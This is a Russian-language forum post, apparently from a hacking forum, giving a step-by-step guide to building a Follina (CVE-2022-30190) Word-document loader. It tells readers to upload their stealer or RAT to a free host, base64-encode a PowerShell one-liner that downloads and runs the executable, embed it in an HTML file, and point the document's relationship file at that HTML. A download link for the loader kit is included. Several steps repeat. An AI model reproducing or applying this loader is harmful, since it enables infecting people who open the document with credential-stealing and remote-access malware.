Недавно наткнулся на уязвимость CVE-2022-30190 и решил сделать лоадер (строго не судите) из doc . При запуски doc будет подгружаться exe. На просторах интернета похожего не нашёл. Получилось так себе, но пользоваться можно
.
Файлы которые нам понадобиться https://anonfiles.com/96W1efz1y3/WORD_LOADER_rar
Файлы которые нам понадобиться https://anonfiles.com/96W1efz1y3/WORD_LOADER_rar
Заходим на хостинг , я беру бесплатный free.sprinthost.ru (не реклама).
Переходим в Файловый менеджер
![[IMG]](../../_assets/img/dP1Hhqp_71ca3ef.png "[IMG]")
Загружаем 1.html (как его изменить расписано снизу) и ваш [tooltip=9]стиллер[/tooltip] или [tooltip=103]ратник[/tooltip]
![[IMG]](../../_assets/img/klSEESe_246d60f1.png "[IMG]")
Переходим в Файловый менеджер
Загружаем 1.html (как его изменить расписано снизу) и ваш [tooltip=9]стиллер[/tooltip] или [tooltip=103]ратник[/tooltip]
Переходим на сайт base64encode.org и вводим
Вместо hosting нужно ввести ваш домен который мы создали выше , а вместо file.exe название вашего exe которого мы загрузили на хостинг .
Потом всё это перекидываем на сайт , после нажимаем на encode и копируем что получилось
![[IMG]](../../_assets/img/bR2Dgjz_7a5a9fa0.png "[IMG]")
Разархивируем файлы которые скачали , открываем 1.html через текстовый редактор листаем в самый вниз и находим "LOLZTEAMMMMMMMM"
![[IMG]](../../_assets/img/9cxlYVm_66ef7ca3.png "[IMG]")
Вместо "LOLZTEAMMMMMMMM" вставляем что выдал base64encode.org , после сохраняем файл
Код:
Get-Process -Name msdt|Stop-Process;powershell -nop -c New-Item -Path "C:\" -Name "temp" -ItemType Directory
(New-Object System.Net.WebClient).DownloadFile("http://hosting/file.exe","C:\temp\file.exe")
Start-Process ("C:\temp\file.exe")Потом всё это перекидываем на сайт , после нажимаем на encode и копируем что получилось
Разархивируем файлы которые скачали , открываем 1.html через текстовый редактор листаем в самый вниз и находим "LOLZTEAMMMMMMMM"
Вместо "LOLZTEAMMMMMMMM" вставляем что выдал base64encode.org , после сохраняем файл
После того как наш хостинг и файл готов, открываем follina.doc через 7-ZIP и переходим в follina.doc\word\_rels\ и находим файл document.xml.rels ,нажимаем правой кнопкой, редактировать.
![[IMG]](../../_assets/img/NettfQb_4ceb7f0b.png "[IMG]")
Вместо "ССЫЛКА НА САЙТ" вводим ссылку на хостинг и 1.html , должно получиться так http://hosting/1.html
![[IMG]](../../_assets/img/gNyLcIu_1c7ec5e0.png "[IMG]")
Сохраняем , и получаем документ который при открытие будет подгружать ваш файл с хостинга и запускать его .
Если выходит данная картина , то всё работает корректно
![[IMG]](../../_assets/img/BHej2X3_31aa9e2d.png "[IMG]")
Вместо "ССЫЛКА НА САЙТ" вводим ссылку на хостинг и 1.html , должно получиться так http://hosting/1.html
Сохраняем , и получаем документ который при открытие будет подгружать ваш файл с хостинга и запускать его .
Если выходит данная картина , то всё работает корректно
